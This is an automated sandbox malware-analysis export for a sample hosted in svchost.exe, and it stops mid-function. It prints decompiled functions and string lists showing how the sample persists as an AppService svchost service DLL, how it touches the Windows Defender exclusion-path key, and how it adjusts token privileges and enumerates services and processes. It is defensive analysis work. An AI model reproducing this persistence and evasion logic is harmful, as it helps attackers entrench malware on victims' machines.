                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CreateInternetThread$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                            • String ID: AppService$Mozilla/4.0 (compatible)$WspService$netsvcs$svchost.exe
                                                            • API String ID: 949907800-2775505531
                                                            • Opcode ID: 93364024fc43d5ae01f3a0557c40b867651d94c1161c1beb000f77d600ff61f4
                                                            • Instruction ID: b7b9b9bab370d4f46ec8bf61db76c76eb5ca47855f61b2d502462a9caecf91fb
                                                            • Opcode Fuzzy Hash: 93364024fc43d5ae01f3a0557c40b867651d94c1161c1beb000f77d600ff61f4
                                                            • Instruction Fuzzy Hash: 60613B33601A41B2FF369BE6B85D7DA73E1FB89B86F440525994A47B6ADF3EC0448700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                            • String ID:
                                                            • API String ID: 3038321057-0
                                                            • Opcode ID: 606a530153bfaf833a05266ad45227eaf8efb2bfc1ccbde9458617e2ac6c2f81
                                                            • Instruction ID: a030ad41f799933a33ef84eecafe27ec44fccd3a17cbc349308fd596e279811f
                                                            • Opcode Fuzzy Hash: 606a530153bfaf833a05266ad45227eaf8efb2bfc1ccbde9458617e2ac6c2f81
                                                            • Instruction Fuzzy Hash: AF115673214B44A6EB618F61F84C29EB7B1FBC8B80F404515EA5E43A69DF3DC445CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 257 22baf4702e8-22baf470366 call 22baf4700f8 * 6 270 22baf47036f-22baf470377 257->270 271 22baf470368-22baf47036a 257->271 273 22baf470379-22baf470381 270->273 274 22baf470383-22baf470391 270->274 272 22baf4706c4-22baf4706d8 271->272 273->271 273->274 274->271 275 22baf470393-22baf47039a 274->275 276 22baf47039c-22baf4703a3 275->276 277 22baf4703a5-22baf4703af 275->277 276->271 276->277 277->271 278 22baf4703b1-22baf4703b6 277->278 278->271 279 22baf4703b8-22baf4703c2 278->279 279->271 280 22baf4703c4-22baf4703d9 279->280 281 22baf4703fd-22baf470405 280->281 282 22baf4703db-22baf4703dc 280->282 281->271 284 22baf47040b-22baf470425 281->284 283 22baf4703e2-22baf4703e9 282->283 283->271 285 22baf4703ef-22baf4703f9 283->285 286 22baf470427-22baf470428 284->286 287 22baf470463-22baf470468 284->287 285->283 290 22baf4703fb 285->290 288 22baf47042e-22baf470461 286->288 287->271 289 22baf47046e-22baf470487 287->289 288->287 288->288 289->271 292 22baf47048d-22baf4704a8 289->292 290->281 294 22baf4704aa-22baf4704ab 292->294 295 22baf4704f3-22baf4704fb 292->295 298 22baf4704ae-22baf4704bf 294->298 296 22baf470500-22baf47050e 295->296 297 22baf4704fd 295->297 299 22baf470512-22baf47051a 296->299 300 22baf470510 296->300 297->296 301 22baf4704c1-22baf4704cc 298->301 302 22baf4704e3-22baf4704ec 298->302 303 22baf470520-22baf470527 299->303 304 22baf4705ae-22baf4705b6 299->304 300->299 301->302 305 22baf4704ce-22baf4704e1 301->305 302->298 306 22baf4704ee-22baf4704ef 302->306 303->304 309 22baf47052d-22baf470541 303->309 307 22baf4705bc-22baf4705c4 304->307 308 22baf470656-22baf470660 304->308 305->302 306->295 307->308 310 22baf4705ca-22baf4705ea LoadLibraryA 307->310 313 22baf470662-22baf47066a 308->313 314 22baf470689-22baf4706a3 308->314 309->304 311 22baf470543-22baf470544 309->311 310->271 316 22baf4705f0-22baf4705f6 310->316 317 22baf470549-22baf470558 311->317 313->314 315 22baf47066c-22baf470686 313->315 324 22baf4706c2 314->324 325 22baf4706a5-22baf4706bd 314->325 315->314 318 22baf47063f-22baf470647 316->318 319 22baf4705f8-22baf4705fc 316->319 321 22baf47055a-22baf47055b 317->321 322 22baf470595-22baf4705a4 317->322 318->310 327 22baf470649-22baf470652 318->327 323 22baf4705fe-22baf470607 319->323 326 22baf47055e-22baf470576 321->326 322->317 328 22baf4705a6-22baf4705a7 322->328 329 22baf47060e-22baf470613 323->329 330 22baf470609-22baf47060c 323->330 324->272 325->271 331 22baf470589-22baf470590 326->331 332 22baf470578-22baf470586 326->332 327->308 328->304 333 22baf470615-22baf470622 329->333 330->333 331->326 335 22baf470592-22baf470593 331->335 332->331 333->271 338 22baf470628-22baf47063d 333->338 335->322 338->318 338->323
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.790579289.0000022BAF470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf470000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 739c296a9697dce867674b68c91ad80ebd600e591245c06e1fe6f325da1f2255
                                                            • Instruction ID: 18f3ca021b3817cf8b2a417d8017740e06fbebeb0b39122a12bbb055a0e63a26
                                                            • Opcode Fuzzy Hash: 739c296a9697dce867674b68c91ad80ebd600e591245c06e1fe6f325da1f2255
                                                            • Instruction Fuzzy Hash: 9AD1C231215A099BEB6DDA6CC89D3F677D1FB94305F18452DD48BC3285EF26E842C781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                            • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 709688788-2346361075
                                                            • Opcode ID: bec658a7c8cccb5f9210049f6dad1c5a3ed7fef517fcb5cc4d39df75041d65dc
                                                            • Instruction ID: 69f9d95289fe6b277686ed321c761adaef6606bde1f838d01eb1aa71cfd40e99
                                                            • Opcode Fuzzy Hash: bec658a7c8cccb5f9210049f6dad1c5a3ed7fef517fcb5cc4d39df75041d65dc
                                                            • Instruction Fuzzy Hash: B3416C73205B84E2EB319FA5F48D39AB7A5F784B94F404015EA8D43B6ADF79C158CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 16%
                                                            			E0000022B22BAF54C100(void* __eflags, intOrPtr* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				char _v640;
                                                            				char _v644;
                                                            				char _v648;
                                                            				signed char* _v656;
                                                            				signed char* _v664;
                                                            				void* __rbx;
                                                            				long _t44;
                                                            				char _t45;
                                                            				void* _t55;
                                                            				intOrPtr _t56;
                                                            				void* _t70;
                                                            				signed long long _t72;
                                                            				signed char* _t75;
                                                            				signed char* _t78;
                                                            				signed char* _t79;
                                                            				char* _t94;
                                                            				intOrPtr* _t100;
                                                            				signed long long _t102;
                                                            				char* _t107;
                                                            
                                                            				_t72 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t72 ^ _t102;
                                                            				_a16 = __rsi;
                                                            				_t100 = __rcx;
                                                            				E0000022B22BAF549800(_t78, L"Global",  &_v632, __rcx);
                                                            				wsprintfW(??, ??);
                                                            				r9d = 0x20119;
                                                            				r8d = 0;
                                                            				_v664 =  &_v640;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54c23b;
                                                            				_t75 =  &_v648;
                                                            				_v656 = _t75;
                                                            				_a24 = __rdi;
                                                            				r8d = 0;
                                                            				_v664 = _t78;
                                                            				_v648 = 0;
                                                            				if (RegQueryValueExW(??, ??, ??, ??, ??, ??) != 0) goto 0xaf54c225;
                                                            				if (_v648 == 0) goto 0xaf54c225;
                                                            				E0000022B22BAF55A828(_t55, _v640);
                                                            				if (_t75 == 0) goto 0xaf54c225;
                                                            				_v656 =  &_v648;
                                                            				_t107 =  &_v644;
                                                            				r8d = 0;
                                                            				_v664 = _t75;
                                                            				_t94 = "1"; // executed
                                                            				_t44 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
                                                            				if (_t44 != 0) goto 0xaf54c21a;
                                                            				_t45 = _v648;
                                                            				if (_t45 == 0) goto 0xaf54c21a;
                                                            				if (_v644 != 3) goto 0xaf54c21a;
                                                            				if (__rcx == 0) goto 0xaf54c225;
                                                            				 *__rcx = _t45;
                                                            				goto 0xaf54c225;
                                                            				E0000022B22BAF55A7E4( &_v648, _t75);
                                                            				RegCloseKey(??);
                                                            				_t79 = _t78;
                                                            				_t56 =  *_t100;
                                                            				_t70 = _t56 - 1;
                                                            				if (_t70 <= 0) goto 0xaf54c28f;
                                                            				 *(_t94 + _t79) =  *(_t94 + _t79) ^  *_t79 & 0x000000ff;
                                                            				if (_t70 == 0) goto 0xaf54c285;
                                                            				r8d = _t56 - 1 + 0xffffffff;
                                                            				r9d = _t94 + 1;
                                                            				asm("o16 nop [eax+eax]");
                                                            				r9d = _t107 - 1;
                                                            				 *( &_v632 + _t79) =  *( &_v632 + _t79) ^  *(_t107 + _t79) & 0x000000ff;
                                                            				if (_t70 != 0) goto 0xaf54c270;
                                                            				 *(_t94 + _t79) =  *(_t94 + _t79) ^  *(_v640 + _t79) & 0x000000ff;
                                                            				return E0000022B22BAF55A7C0( *(_v640 + _t79) & 0x000000ff, _t79, _v24 ^ _t102);
                                                            			}
                                                            0x22baf54c109
                                                            0x22baf54c113
                                                            0x22baf54c11b
                                                            0x22baf54c128
                                                            0x22baf54c132
                                                            0x22baf54c14b
                                                            0x22baf54c156
                                                            0x22baf54c15c
                                                            0x22baf54c15f
                                                            0x22baf54c17d
                                                            0x22baf54c188
                                                            0x22baf54c18d
                                                            0x22baf54c197
                                                            0x22baf54c1a6
                                                            0x22baf54c1a9
                                                            0x22baf54c1ae
                                                            0x22baf54c1bc
                                                            0x22baf54c1c4
                                                            0x22baf54c1c8
                                                            0x22baf54c1d3
                                                            0x22baf54c1df
                                                            0x22baf54c1e4
                                                            0x22baf54c1e9
                                                            0x22baf54c1ec
                                                            0x22baf54c1f1
                                                            0x22baf54c1f8
                                                            0x22baf54c200
                                                            0x22baf54c202
                                                            0x22baf54c208
                                                            0x22baf54c20f
                                                            0x22baf54c214
                                                            0x22baf54c216
                                                            0x22baf54c218
                                                            0x22baf54c21d
                                                            0x22baf54c22a
                                                            0x22baf54c230
                                                            0x22baf54c23b
                                                            0x22baf54c245
                                                            0x22baf54c248
                                                            0x22baf54c24f
                                                            0x22baf54c255
                                                            0x22baf54c257
                                                            0x22baf54c25a
                                                            0x22baf54c265
                                                            0x22baf54c275
                                                            0x22baf54c279
                                                            0x22baf54c283
                                                            0x22baf54c28c
                                                            0x22baf54c2aa

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen$wsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3581893009-1865207932
                                                            • Opcode ID: 176ecf4b2d2ed51e3b65fab97b9e2840988407a2e7ca45b332da4c3537147ec5
                                                            • Instruction ID: 1ffd35dd3d39c444c2260060478d5a17ada4bebcf3fc21c8a85ff45649321189
                                                            • Opcode Fuzzy Hash: 176ecf4b2d2ed51e3b65fab97b9e2840988407a2e7ca45b332da4c3537147ec5
                                                            • Instruction Fuzzy Hash: 3041E633218A81A2EB728FA1F44D3DE77A1F785784F445225EACA47B5ADF39C505CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Token$CloseHandleProcess$CurrentDuplicateInformationOpen
                                                            • String ID:
                                                            • API String ID: 3042581256-0
                                                            • Opcode ID: 6359db43e77064e405f4415af4b66f58b51b3cbb6850ad2b13ffff9c0d2738e8
                                                            • Instruction ID: b1b4f2d92108d2dbca764e4fcb99f663ed9f290670614e16a621ecf03512dad3
                                                            • Opcode Fuzzy Hash: 6359db43e77064e405f4415af4b66f58b51b3cbb6850ad2b13ffff9c0d2738e8
                                                            • Instruction Fuzzy Hash: 8D112933608B81A2EB218F91F44C78AB7A1F7C0B99F404015DA8947A69DFBEC049CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 592884611-0
                                                            • Opcode ID: f8e94aababa1d42a823a31684b0824b013978815464b1e91387632cdba9d0864
                                                            • Instruction ID: 97ba4fef74735a14ac17fdebca33bfb49eee69993961df7442436a17d3504527
                                                            • Opcode Fuzzy Hash: f8e94aababa1d42a823a31684b0824b013978815464b1e91387632cdba9d0864
                                                            • Instruction Fuzzy Hash: BA113C33604A85A2EF31CB61F48D39A73A4F788B81F5446259A4D47719DF3DC545CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: PrivilegeProcess$CheckCurrentLookupOpenTokenValue
                                                            • String ID:
                                                            • API String ID: 3991982149-0
                                                            • Opcode ID: 1c8359fc17c4000b2134039da52b37f622534ab4c7cdcb34b7ee8ba26eebee4d
                                                            • Instruction ID: 3acafc8077dee0b34049201ead822e26181af3147a2669349bac4cb88888682b
                                                            • Opcode Fuzzy Hash: 1c8359fc17c4000b2134039da52b37f622534ab4c7cdcb34b7ee8ba26eebee4d
                                                            • Instruction Fuzzy Hash: 30110A72229B8496EB648F90F44929AB7B0F388758F401019FA8E47B59DF7DD144CF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                            • String ID:
                                                            • API String ID: 4201418100-0
                                                            • Opcode ID: 1210be82f61195dc78fd122f99fa871274a3fff703f060ebbf6fd243cd5f5361
                                                            • Instruction ID: 30cda81c371da4df9fd28e2d8b74d343b2eb1f641fc39da4dfb03fc2d0c8715b
                                                            • Opcode Fuzzy Hash: 1210be82f61195dc78fd122f99fa871274a3fff703f060ebbf6fd243cd5f5361
                                                            • Instruction Fuzzy Hash: 3FE0EC22A10601F3EB2A6BA2DC9D3993352E799716F814925C106856AACF2E85898601
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF56ED24(intOrPtr* __rax, void* __rcx) {
                                                            				int _t1;
                                                            				intOrPtr _t4;
                                                            				void* _t10;
                                                            				intOrPtr _t14;
                                                            
                                                            				if (__rcx == 0) goto 0xaf56ed60;
                                                            				_t14 =  *0xaf599788; // 0x22baed00000, executed
                                                            				_t1 = HeapFree(_t10, ??); // executed
                                                            				if (_t1 != 0) goto 0xaf56ed5b;
                                                            				E0000022B22BAF567054(__rax);
                                                            				_t4 = E0000022B22BAF566F9C(GetLastError(), __rax, _t14, __rcx);
                                                            				 *__rax = _t4;
                                                            				return _t4;
                                                            			}
                                                            0x22baf56ed27
                                                            0x22baf56ed33
                                                            0x22baf56ed3a
                                                            0x22baf56ed42
                                                            0x22baf56ed44
                                                            0x22baf56ed54
                                                            0x22baf56ed59
                                                            0x22baf56ed60

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 141e3d82385d6fa18b4560c9f8b502fa2d773691cc595bbadd310f7f2727746f
                                                            • Instruction ID: e2edbc41237ee345e3dfc79a3d24059500bf77cbac1ce8ced300c179a7bcbe46
                                                            • Opcode Fuzzy Hash: 141e3d82385d6fa18b4560c9f8b502fa2d773691cc595bbadd310f7f2727746f
                                                            • Instruction Fuzzy Hash: EFE08662712105B3FF7A6BF3948C3E873919B44780F080424992547297EF3A44814204
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 58%
                                                            			E0000022B22BAF5310D0() {
                                                            				void* _t10;
                                                            				signed long long _t12;
                                                            				signed long long _t13;
                                                            				signed long long _t18;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            
                                                            				_t20 = _t19 - 0x30;
                                                            				_t18 = _t20 + 0x20;
                                                            				_t12 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t13 = _t12 ^ _t18;
                                                            				 *_t18 = _t13;
                                                            				__imp__#115(); // executed
                                                            				 *0xaf599e84 =  *((intOrPtr*)(_t20 - _t13 + 0x20));
                                                            				E0000022B22BAF55AC28(_t10, _t13);
                                                            				return E0000022B22BAF55A7C0(0x202, _t13,  *_t18 ^ _t18);
                                                            			}
                                                            0x22baf5310d2
                                                            0x22baf5310d6
                                                            0x22baf5310db
                                                            0x22baf5310e2
                                                            0x22baf5310e5
                                                            0x22baf531100
                                                            0x22baf53110d
                                                            0x22baf531113
                                                            0x22baf531129

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Startup_onexit
                                                            • String ID:
                                                            • API String ID: 3012808385-0
                                                            • Opcode ID: 1f1975418b18153ffd42a2bf71cf3ef0b2b739cee56a3fbbc5a583c72f8ace5f
                                                            • Instruction ID: fad5be03e056585480f8198ca43477b92fbd5fec88e92825eb4cb02022daee67
                                                            • Opcode Fuzzy Hash: 1f1975418b18153ffd42a2bf71cf3ef0b2b739cee56a3fbbc5a583c72f8ace5f
                                                            • Instruction Fuzzy Hash: 04F0F876211A84EBEB22EFA4E85D2D873A4F748704F848412A98D4776ADF39C215CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.790579289.0000022BAF470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf470000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
                                                            • Instruction ID: 5adb3552c8b64d4553b07a026c780a20759e30d106001a2b3cffbc0e9f8c7e51
                                                            • Opcode Fuzzy Hash: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
                                                            • Instruction Fuzzy Hash: 7B31F53260CB485FEB49EB6C940D7AABBD1FB94320F04055EE48AD3286DF64ED0187C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
control_flow_graph 372 22baf54cf80-22baf54d000 call 22baf563830 RegOpenKeyExW 375 22baf54d002-22baf54d047 RegQueryValueExW RegCloseKey 372->375 376 22baf54d049-22baf54d05c call 22baf563830 372->376 375->376 377 22baf54d060-22baf54d0ca lstrlenW wsprintfW call 22baf549b50 375->377 376->377 382 22baf54d0cc-22baf54d0df 377->382 383 22baf54d0f3-22baf54d145 wsprintfW * 2 RegOpenKeyExW 377->383 384 22baf54d0f0 382->384 385 22baf54d0e1-22baf54d0e5 382->385 386 22baf54d147-22baf54d15d RegCloseKey SHDeleteKeyW 383->386 387 22baf54d163-22baf54d1a1 RegCreateKeyExW 383->387 384->383 388 22baf54d0eb-22baf54d0ee 385->388 389 22baf54d0e7-22baf54d0e9 385->389 386->387 390 22baf54d1a7-22baf54d1e9 RegSetValueExW RegCloseKey 387->390 391 22baf54d7b6 387->391 388->383 389->383 390->391 393 22baf54d1ef-22baf54d22d RegCreateKeyExW 390->393 392 22baf54d7b8-22baf54d7de call 22baf55a7c0 391->392 393->391 395 22baf54d233-22baf54d275 RegSetValueExW RegCloseKey 393->395 395->391 397 22baf54d27b-22baf54d2b9 RegCreateKeyExW 395->397 397->391 398 22baf54d2bf-22baf54d301 RegSetValueExW RegCloseKey 397->398 398->391 399 22baf54d307-22baf54d345 RegCreateKeyExW 398->399 399->391 400 22baf54d34b-22baf54d357 399->400 401 22baf54d360-22baf54d369 400->401 401->401 402 22baf54d36b-22baf54d3ad RegSetValueExW RegCloseKey 401->402 402->391 403 22baf54d3b3-22baf54d3f1 RegCreateKeyExW 402->403 403->391 404 22baf54d3f7-22baf54d438 RegSetValueExW RegCloseKey 403->404 404->391 405 22baf54d43e-22baf54d47c RegCreateKeyExW 404->405 405->391 406 22baf54d482-22baf54d48a 405->406 407 22baf54d490-22baf54d499 406->407 407->407 408 22baf54d49b-22baf54d4dd RegSetValueExW RegCloseKey 407->408 408->391 409 22baf54d4e3-22baf54d521 RegCreateKeyExW 408->409 409->391 410 22baf54d527-22baf54d56b RegSetValueExW RegCloseKey 409->410 410->391 411 22baf54d571-22baf54d5c5 wsprintfW RegCreateKeyExW 410->411 411->391 412 22baf54d5cb-22baf54d5d2 411->412 413 22baf54d5d5-22baf54d5de 412->413 413->413 414 22baf54d5e0-22baf54d627 RegSetValueExW RegCloseKey 413->414 414->391 415 22baf54d62d-22baf54d66e RegCreateKeyExW 414->415 415->391 416 22baf54d674-22baf54d679 415->416 417 22baf54d680-22baf54d689 416->417 417->417 418 22baf54d68b-22baf54d6d0 RegSetValueExW RegCloseKey 417->418 418->391 419 22baf54d6d6 418->419 420 22baf54d6dd call 22baf54ce70 419->420 421 22baf54d6e2-22baf54d6e4 420->421 421->391 422 22baf54d6ea-22baf54d740 call 22baf563214 RegCreateKeyExW 421->422 425 22baf54d742-22baf54d776 RegSetValueExW RegCloseKey 422->425 426 22baf54d77c-22baf54d780 422->426 425->426 427 22baf54d782-22baf54d7ab wsprintfW SHDeleteKeyW 426->427 428 22baf54d7b1-22baf54d7b4 426->428 427->428 428->392
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$Value$Create$wsprintf$DeleteOpen$Querylstrlen
                                                            • String ID: $%SystemRoot%\System32\svchost.exe -k AppService$.tmp$?$AppService$AppService%c$Description$DisplayName$ErrorControl$ImagePath$LoaderDll%d$LocalSystem$ObjectName$SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll$Start$Type
                                                            • API String ID: 499743384-2617351667
                                                            • Opcode ID: 960aca078e9da884603cc79a8df186a3e70386ff5267fb80081fb0fe69ed83bf
                                                            • Instruction ID: 15ea783beb340527513d95bfffb4b3238565ca28b509cad291b3d1e563618299
                                                            • Opcode Fuzzy Hash: 960aca078e9da884603cc79a8df186a3e70386ff5267fb80081fb0fe69ed83bf
                                                            • Instruction Fuzzy Hash: 55329173214B95A6EB21CFA4F48C78AB7A4F784B98F400215EB9907F59DF7AC109CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
control_flow_graph 429 22baf545fd0-22baf546021 OpenSCManagerW 430 22baf546023-22baf546069 EnumServicesStatusExW 429->430 431 22baf546074-22baf546076 429->431 432 22baf54607b-22baf5460a8 LocalAlloc 430->432 433 22baf54606b-22baf54606e CloseServiceHandle 430->433 434 22baf5467e9-22baf546803 call 22baf55a7c0 431->434 435 22baf5460b7-22baf5460fa EnumServicesStatusExW 432->435 436 22baf5460aa-22baf5460b2 CloseServiceHandle 432->436 433->431 439 22baf5460fc-22baf546110 CloseServiceHandle LocalFree 435->439 440 22baf546115-22baf54619c LocalAlloc * 3 call 22baf563830 435->440 438 22baf5467d9-22baf5467e1 436->438 438->434 439->438 444 22baf5461a2-22baf5461a9 440->444 445 22baf546784-22baf5467d1 LocalReAlloc LocalFree * 3 CloseServiceHandle 440->445 446 22baf5461b0-22baf5461ed OpenServiceW 444->446 445->438 447 22baf546299-22baf54631e call 22baf563830 * 2 wsprintfW call 22baf563830 RegOpenKeyExW 446->447 448 22baf5461f3-22baf54620c QueryServiceConfigW 446->448 459 22baf546320-22baf546365 RegQueryValueExW RegCloseKey 447->459 460 22baf54638d-22baf546394 447->460 449 22baf54625d-22baf546283 QueryServiceConfig2W 448->449 450 22baf54620e-22baf546259 448->450 452 22baf546290-22baf546293 CloseServiceHandle 449->452 453 22baf546285-22baf54628c 449->453 450->449 452->447 453->452 459->460 461 22baf546367-22baf54636b 459->461 462 22baf5463f5 460->462 463 22baf546396-22baf5463a1 460->463 461->460 467 22baf54636d-22baf54638b ExpandEnvironmentStringsW 461->467 466 22baf5463f9-22baf5464c6 call 22baf5495d0 lstrlenW * 11 LocalSize 462->466 464 22baf5463cb 463->464 465 22baf5463a3 463->465 469 22baf5463d1-22baf5463d8 464->469 468 22baf5463a7-22baf5463ad 465->468 477 22baf5464e1-22baf54677e lstrlenW call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW 466->477 478 22baf5464c8-22baf5464dc LocalReAlloc 466->478 467->466 471 22baf5463af-22baf5463b3 468->471 472 22baf5463f0 468->472 469->472 473 22baf5463da-22baf5463ec 469->473 471->472 475 22baf5463b5-22baf5463c7 471->475 472->462 473->469 476 22baf5463ee 473->476 475->468 480 22baf5463c9 475->480 476->462 477->445 477->446 478->477 480->462
                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF545FD0(void* __rdx, long long __rdi, long long __rsi, long long __r12, long long __r14, long long __r15) {
                                                            				void* __rbp;
                                                            				intOrPtr _t286;
                                                            				signed int _t321;
                                                            				signed short _t347;
                                                            				void* _t350;
                                                            				void* _t367;
                                                            				signed long long _t394;
                                                            				signed long long _t395;
                                                            				signed long long _t398;
                                                            				signed long long _t401;
                                                            				intOrPtr _t402;
                                                            				intOrPtr _t403;
                                                            				signed long long _t410;
                                                            				signed long long _t411;
                                                            				signed long long _t412;
                                                            				signed long long _t418;
                                                            				intOrPtr _t430;
                                                            				void* _t469;
                                                            				void* _t475;
                                                            				signed long long _t513;
                                                            				signed long long _t523;
                                                            				signed long long _t527;
                                                            				intOrPtr* _t536;
                                                            				intOrPtr* _t537;
                                                            				void* _t540;
                                                            				void* _t541;
                                                            				signed long long _t542;
                                                            				void* _t544;
                                                            				signed long long _t563;
                                                            				signed long long _t565;
                                                            				signed long long _t575;
                                                            
                                                            				_t499 = __rdx;
